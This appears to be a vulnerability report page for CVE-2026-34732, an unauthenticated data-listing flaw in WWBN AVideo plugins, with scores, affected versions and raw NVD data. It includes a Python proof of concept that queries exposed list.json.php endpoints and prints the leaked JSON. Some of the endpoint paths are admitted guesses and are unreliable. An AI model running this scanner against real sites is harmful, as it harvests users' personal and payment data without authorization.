Security Vulnerability Report
CVE-2026-34732 CVSS 5.3 MEDIUM

Published: 2026-03-31 21:16:32
Last Modified: 2026-04-01 18:38:07

Description

WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo CreatePlugin template for list.json.php does not include any authentication or authorization check. While the companion templates add.json.php and delete.json.php both require admin privileges, the list.json.php template was shipped without this guard. Every plugin that uses the CreatePlugin code generator inherits this omission, resulting in 21 unauthenticated data listing endpoints across the platform. These endpoints expose sensitive data including user PII, payment transaction logs, IP addresses, user agents, and internal system records. At time of publication, there are no publicly available patches.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Weakness
CWE-306 (Missing Authentication for Critical Function)

Note: the 5.3 MEDIUM score above is the CNA's secondary metric. The NVD primary metric in the raw record below rates the same issue 7.5 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N), the only difference being Confidentiality impact High rather than Low, which matches the PII and payment-log exposure described.

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# PoC for CVE-2026-34732: WWBN AVideo Unauthenticated Data Listing
# This script checks for exposed list.json.php endpoints in plugins.


def check_vulnerability(target_url):
    # Common vulnerable endpoint patterns based on the CreatePlugin template
    # The exact list of 21 endpoints varies by installation, here are examples
    endpoints = [
        "/plugin/AVideoPluginExample/list.json.php",
        "/plugin/Marketplace/list.json.php",
        "/plugin/Meet/list.json.php",
        "/plugin/Social/login.json.php",  # Hypothetical path based on structure
        "/plugin/Streamer/list.json.php",
    ]
    print(f"[*] Scanning target: {target_url}")
    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated GET request
            response = requests.get(full_url, timeout=5)
            if response.status_code == 200:
                try:
                    data = response.json()
                    print(f"[+] Potential sensitive data leak found at: {full_url}")
                    print(f"[+] Response preview: {str(data)[:200]}...")
                except ValueError:
                    # Not JSON, might be HTML error or redirect
                    pass
        except requests.RequestException as e:
            print(f"[-] Error connecting to {full_url}: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 cve_2026_34732_poc.py <http://target_url>")
        print("Example: python3 cve_2026_34732_poc.py http://localhost/avideo")
    else:
        check_vulnerability(sys.argv[1])
```

References

https://github.com/WWBN/AVideo/security/advisories/GHSA-g2mg-cgr6-vmv7 (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34732",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T21:16:31.910",
    "lastModified": "2026-04-01T18:38:07.460",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the AVideo CreatePlugin template for list.json.php does not include any authentication or authorization check. While the companion templates add.json.php and delete.json.php both require admin privileges, the list.json.php template was shipped without this guard. Every plugin that uses the CreatePlugin code generator inherits this omission, resulting in 21 unauthenticated data listing endpoints across the platform. These endpoints expose sensitive data including user PII, payment transaction logs, IP addresses, user agents, and internal system records. At time of publication, there are no publicly available patches."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "26.0",
                "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g2mg-cgr6-vmv7",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-g2mg-cgr6-vmv7",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```